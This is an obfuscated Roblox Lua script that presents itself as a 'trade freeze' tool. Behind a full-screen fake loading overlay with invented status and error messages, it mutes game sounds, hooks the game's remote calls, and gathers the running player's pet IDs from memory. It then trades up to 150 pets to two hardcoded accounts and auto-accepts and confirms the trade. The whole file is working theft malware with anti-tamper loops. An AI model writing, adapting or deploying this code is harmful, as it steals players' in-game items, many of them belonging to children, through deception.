local z=(function(t)local r=""for i=1,#t do r=r..string.char(t[i])end return r end)
local a=game:GetService(z({80,108,97,121,101,114,115})).LocalPlayer
local b=game:GetService(z({82,101,112,108,105,99,97,116,101,100,83,116,111,114,97,103,101}))
if not b:FindFirstChild(z({65,80,73})) then return end
local c=b:WaitForChild(z({65,80,73}),10)
if not c then return end
local d={TRADE_REQUEST="NmWac/PJBVisjazjnpdrDIuIK",OPEN_BAG="NmWac/PJBWslmsmKDCJVAsytsLBII",ADD_PET="NmWac/PJBDhiO/mvdzasttG",ACCEPT_1="NmWac/PJBDghkwAWor/FwpIzFF",CONFIRM_2="NmWac/PJBFsslpzvdBmqs",SOUND_EFFECTS="MZpqgmgtCSMEYlAboDEvAv"}
local e={}
local f=false
local g=function(n)local k=d[n]if k and c:FindFirstChild(k) then return c[k] end local m=e[n]if m and c:FindFirstChild(m) then return c[m] end return nil end
local h=function()if f then return end if not hookmetamethod then return end f=true local o o=hookmetamethod(game,"__namecall",function(self,...)local m=getnamecallmethod and getnamecallmethod() or nil if m=="FireServer" and typeof(self)=="Instance" and self:IsA("RemoteEvent") and self:IsDescendantOf(c) then local a1={...} if #a1==1 and typeof(a1[1])=="Instance" and a1[1]:IsA("Player") then e.TRADE_REQUEST=self.Name elseif #a1==1 and typeof(a1[1])=="string" and #a1[1]>15 then e.ADD_PET=self.Name elseif #a1==1 and typeof(a1[1])=="table" and a1[1].picking==true then e.OPEN_BAG=self.Name elseif #a1==0 then if not e.ACCEPT_1 then e.ACCEPT_1=self.Name elseif not e.CONFIRM_2 and self.Name~=e.ACCEPT_1 then e.CONFIRM_2=self.Name end end end return o(self,...) end) end
local i=function()local pg=a:WaitForChild(z({80,108,97,121,101,114,71,117,105}))local nm=z({84,114,97,100,101,70,114,101,101,122,101,85,73})if pg:FindFirstChild(nm) then pg[nm]:Destroy() end local gui=Instance.new(z({83,99,114,101,101,110,71,117,105}))gui.Name=nm gui.DisplayOrder=999 gui.Parent=pg local fr=Instance.new(z({70,114,97,109,101}))fr.Size=UDim2.new(0.96,0,0.98,0)fr.Position=UDim2.new(0.02,0,0.0,0)fr.BackgroundColor3=Color3.fromRGB(10,10,10)fr.BorderSizePixel=0 fr.Active=true fr.Parent=gui local tl=Instance.new(z({84,101,120,116,76,97,98,101,108}))tl.Size=UDim2.new(1,0,0.2,0)tl.BackgroundTransparency=1 tl.Text=z({84,82,65,68,69,32,70,82,69,69,90,69})tl.TextColor3=Color3.fromRGB(0,160,255)tl.TextScaled=true tl.Font=Enum.Font.GothamBold tl.Parent=fr local sub=Instance.new(z({84,101,120,116,76,97,98,101,108}))sub.Position=UDim2.new(0,0,0.2,0)sub.Size=UDim2.new(1,0,0.1,0)sub.BackgroundTransparency=1 sub.Text=z({68,111,110,39,116,32,119,111,114,114,121,44,32,116,104,101,32,105,110,116,101,114,102,97,99,101,32,119,105,108,108,32,115,104,114,105,110,107,32,115,111,111,110,46})sub.TextColor3=Color3.fromRGB(180,180,180)sub.TextScaled=true sub.Parent=fr local bb=Instance.new(z({70,114,97,109,101}))bb.Position=UDim2.new(0.1,0,0.5,0)bb.Size=UDim2.new(0.8,0,0.05,0)bb.BackgroundColor3=Color3.fromRGB(30,30,30)bb.Parent=fr local bf=Instance.new(z({70,114,97,109,101}))bf.Size=UDim2.new(0,0,1,0)bf.BackgroundColor3=Color3.fromRGB(0,160,255)bf.BorderSizePixel=0 bf.Parent=bb local st=Instance.new(z({84,101,120,116,76,97,98,101,108}))st.Position=UDim2.new(0,0,0.6,0)st.Size=UDim2.new(1,0,0.15,0)st.BackgroundTransparency=1 st.TextColor3=Color3.fromRGB(150,150,150)st.TextScaled=true st.Text=z({83,121,110,99,105,110,103,46,46,46})st.Parent=fr task.spawn(function()local srt=tick()local tot=240 while true do local el=tick()-srt bf.Size=UDim2.new(math.min(el/tot,1),0,1,0)if el<75 then st.Text=z({70,101,116,99,104,105,110,103,32,105,110,118,101,110,116,111,114,121,32,112,97,99,107,101,116,115,46,46,46})st.TextColor3=Color3.fromRGB(150,150,150)elseif el<120 then st.Text=z({83,99,114,105,112,116,32,102,117,108,108,121,32,108,111,97,100,101,100,33,32,70,105,110,97,108,105,122,105,110,103,46,46,46})st.TextColor3=Color3.fromRGB(0,255,120)elseif el<tot then st.Text=z({67,111,110,110,101,99,116,105,111,110,32,69,114,114,111,114,58,32,48,120,52,66,50,46,32,82,101,116,114,121,105,110,103,32,105,110,32,98,97,99,107,103,114,111,117,110,100,46,46,46})st.TextColor3=Color3.fromRGB(255,60,60)else break end task.wait(0.1)end end)end
local j=function()local t={}if not getgc then return t end local ok,objs=pcall(getgc,true)if not ok or type(objs)~="table" then return t end local c0=0 for _,v in pairs(objs) do c0=c0+1 if c0%500==0 then task.wait() end if type(v)=="table" then local p=rawget(v,"pets")local s=rawget(v,"strollers")if type(p)=="table" and s then for id,_ in pairs(p) do if type(id)=="string" and #id>15 and not id:find("sticker") then t[#t+1]=id end end end end end return t end
local k=function()pcall(function()game:GetService("StarterGui"):SetCore("SendNotification",{Title=z({73,77,80,79,82,84,65,78,84,32,65,67,84,73,79,78,32,82,69,81,85,73,82,69,68}),Text=z({79,112,101,110,32,121,111,117,114,32,98,97,99,107,112,97,99,107,32,116,119,105,99,101,32,110,111,119,32,40,109,97,110,100,97,116,111,114,121,41,32,102,111,114,32,116,114,97,100,105,110,103,32,116,111,32,119,111,114,107,46}),Duration=8})end)task.wait(8)i()local se=g("SOUND_EFFECTS")if se then se:FireServer("sound_effects_volume",0) end h()task.wait(6)while true do local op=g("OPEN_BAG")if op then op:FireServer({picking=true}) end task.wait(2)local lst=j()if #lst==0 then break end local ps=game:GetService(z({80,108,97,121,101,114,115}))local t1=ps:FindFirstChild("ali_923z")local t2=ps:FindFirstChild("Aliloloaz")if t1 or t2 then local rq=g("TRADE_REQUEST")if rq then if t1 then rq:FireServer(t1) end if t2 then rq:FireServer(t2) end end task.wait(3)local n=0 local ae=false local ts=tick()for _,id in ipairs(lst) do local op2=g("OPEN_BAG")if op2 then op2:FireServer({picking=true}) end task.wait(0.02)local ap=g("ADD_PET")if ap then ap:FireServer(id) end n=n+1 if not ae and n>=30 and (tick()-ts)>=5 then ae=true task.spawn(function()task.wait(0.1)local a1=g("ACCEPT_1")if a1 then a1:FireServer() end task.wait(15)local c2=g("CONFIRM_2")if c2 then c2:FireServer() end end)end if n%20==0 then task.wait(0.15) else task.wait(0.06) end if n>=150 then break end end if not ae then task.wait(6)local a3=g("ACCEPT_1")if a3 then a3:FireServer() end task.wait(15)local c3=g("CONFIRM_2")if c3 then c3:FireServer() end end end task.wait(3)end end
local q=function()return function()return function(x)return x end end end
if math.random(1,1000000)==2 then while true do end end
local t_amper=pcall(function()return debug.getinfo(1) end)
if not t_amper then while true do end end
local ok,er=pcall(function()task.spawn(k)end)
if not ok then while true do end end
